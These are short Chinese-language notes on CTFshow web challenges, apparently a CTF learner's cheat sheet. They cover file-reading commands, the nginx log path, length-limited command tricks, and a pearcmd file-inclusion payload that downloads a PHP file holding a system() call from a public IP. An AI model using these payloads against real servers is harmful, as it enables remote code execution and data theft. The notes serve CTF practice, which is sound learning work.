【CTF-web】CTFshow_萌新web1 wp汇总 - 集苑集枯 (b-yuku.icu)

PHP执行函数（命令执行和代码执行） - 集苑集枯 (b-yuku.icu)

tac顾名思义，cat反过来，输出也是反过来的

php代码的最后一行不需要;

nginx中间件的日志文件都在/var/log/nginx/access.log里

?file=pearcmd&+download+http://公网IP/1.php 文件包含可用，下载指定文件：

1. 用+连接而非空格

2. <?php echo"<?php system('tac 36d.php');?>"; ?> 嵌套一层，因为第一次include的时候会执行一次但不会有回显，所以把<?php system('tac 36d.php');?> 保存到1.php，再手动访问一次

Linux* 会尝试执行第一个当前目录下第一个文件名

nl命令：如nl 123txt ，会把123txt的内容输出，同时有行号

['内容']>txt1 新建一个txt1的文本文件并写入'内容'

输入长度受限输出该目录下文件：7、8、9条结合，就能先>nl新建文件，再用*执行nl(保障nl在最前面)，就能列出当前目录下所有内容。